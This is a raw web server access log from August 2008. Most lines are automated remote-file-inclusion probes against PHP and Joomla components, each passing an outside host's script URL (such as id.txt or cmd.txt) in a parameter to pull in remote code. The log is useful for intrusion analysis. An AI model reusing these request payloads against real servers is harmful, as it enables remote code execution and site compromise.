163.19.117.1 - - [28/Aug/2008:09:59:10 -0700] "GET /logs/access_080409.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:59:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0016.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:59:22 -0700] "GET /logs/access_080409.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:59:38 -0700] "GET /logs/access_080525.log/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:59:40 -0700] "GET /logs/access_080518.log/index.php?option=com_restaurante&task=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.19.103 - - [28/Aug/2008:09:59:58 -0700] "GET /logs/access_080107.log/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.103 - - [28/Aug/2008:09:59:58 -0700] "GET /logs/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.103 - - [28/Aug/2008:09:59:58 -0700] "GET /errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:00:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0162.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
128.177.28.235 - - [28/Aug/2008:10:00:07 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:10:00:09 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:10:00:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:10:00:12 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:00:14 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:00:23 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:33 -0700] "GET /logs/access_080302.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:33 -0700] "GET /logs/access_080302.log/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:34 -0700] "GET /errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:34 -0700] "GET /popup.php?path=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:34 -0700] "GET /logs/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:00:34 -0700] "GET /logs/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:00:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
80.67.19.103 - - [28/Aug/2008:10:00:52 -0700] "GET /logs/access_080717.log/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.103 - - [28/Aug/2008:10:01:19 -0700] "GET /logs/access_080224.log/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:01:34 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:10:01:43 -0700] "GET /logs/access_080510.log//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:10:01:44 -0700] "GET //index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 200 85415 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:10:01:45 -0700] "GET /logs//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:01:50 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:10:01:56 -0700] "GET /logs/access_080329.log//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:02:00 -0700] "GET /logs/access_080113.log/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:02:00 -0700] "GET /errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:02:00 -0700] "GET /logs/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.151 - - [28/Aug/2008:10:02:01 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [28/Aug/2008:10:02:01 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [28/Aug/2008:10:02:01 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [28/Aug/2008:10:02:10 -0700] "GET /logs/access_080324.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:02:18 -0700] "GET /index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:02:18 -0700] "GET /logs/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:02:25 -0700] "GET /logs/access_080401.log/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:02:25 -0700] "GET /errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:02:25 -0700] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:02:31 -0700] "GET /logs/access_080122.log/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:02:32 -0700] "GET /index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:02:32 -0700] "GET /logs/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:02:34 -0700] "GET /logs/access_080401.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:02:35 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:02:36 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.24 - - [28/Aug/2008:10:02:37 -0700] "GET /blog/index.php/2008/06/page/2/ HTTP/1.1" 404 8227 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:02:38 -0700] "GET /logs/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.60.127 - - [28/Aug/2008:10:02:38 -0700] "GET /errors.php?error=http://www.stjudechattanooga.org/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.187.86 - - [28/Aug/2008:10:03:05 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.182.187.86 - - [28/Aug/2008:10:03:05 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.182.187.86 - - [28/Aug/2008:10:03:05 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:10:03:11 -0700] "GET /-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:10:03:15 -0700] "GET /logs/access_080215.log///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:10:03:15 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:10:03:16 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:03:17 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:03:19 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:03:19 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:10:03:53 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:03:54 -0700] "GET /logs/access_080511.log/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:03:56 -0700] "GET /logs/access_080401.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:03:56 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:03:57 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:03:57 -0700] "GET /logs/access_080223.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:03:58 -0700] "GET /logs/access_080216.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:08 -0700] "GET /logs/access_080801.log/administrator/components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:09 -0700] "GET /administrator/components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:04:09 -0700] "GET /logs/access_080511.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:09 -0700] "GET /logs/administrator/components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:10 -0700] "GET /logs/access_080801.log//components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:10 -0700] "GET //components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:04:10 -0700] "GET /logs//components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:04:14 -0700] "GET /logs/access_080507.log/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:04:14 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:04:23 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:41 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33394 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:46 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33413 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:48 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=6&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33361 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:51 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33287 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=6&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:53 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33398 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:56 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=12&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33431 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:04:58 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=PropertyAddress&order_type=ASC HTTP/1.1" 200 33398 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=12&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:10:05:02 -0700] "GET /logs/access_080510.log//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:10:05:04 -0700] "GET //index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 200 85423 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:10:05:05 -0700] "GET /logs//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:05:08 -0700] "GET /logs/access_080507.log/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:05:12 -0700] "GET /logs/access_080701.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:05:13 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:05:13 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:05:14 -0700] "GET /logs/access_080507.log/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:05:14 -0700] "GET /logs/access_080620.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:10:05:19 -0700] "GET /logs/access_080329.log//index.php?option=com_letterman&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:05:26 -0700] "GET /logs/access_080511.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:05:45 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:10:05:53 -0700] "GET /logs/access_080507.log/index2.php?x=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.251.162.130 - - [28/Aug/2008:10:06:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uba.dk/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:06:22 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.20.219.114 - - [28/Aug/2008:10:06:54 -0700] "GET /logs/access_071121.log HTTP/1.0" 200 61524 "http://www.google.com.ec/search?hl=es&q=antivirus&btnG=B%C3%BAsqueda&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q321017; 1&1 Internet AG by USt)" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:06:56 -0700] "GET /logs/access_080702.log//components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [28/Aug/2008:10:07:00 -0700] "GET /logs/access_080702.log/administrator/components/com_banners/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:07:01 -0700] "GET /logs/access_080401.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:07:01 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:07:01 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:07:06 -0700] "GET /logs/access_080113.log/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:07:06 -0700] "GET /errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:07:06 -0700] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:10:07:27 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:10:07:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.170.161 - - [28/Aug/2008:10:07:27 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:07:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0100.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.19.107.26 - - [28/Aug/2008:10:07:36 -0700] "GET /logs/access_080122.log/errors.php?error=http://freewebtown.com/ceasca/romania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:07:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0029.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:08:11 -0700] "GET /logs/access_080512.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
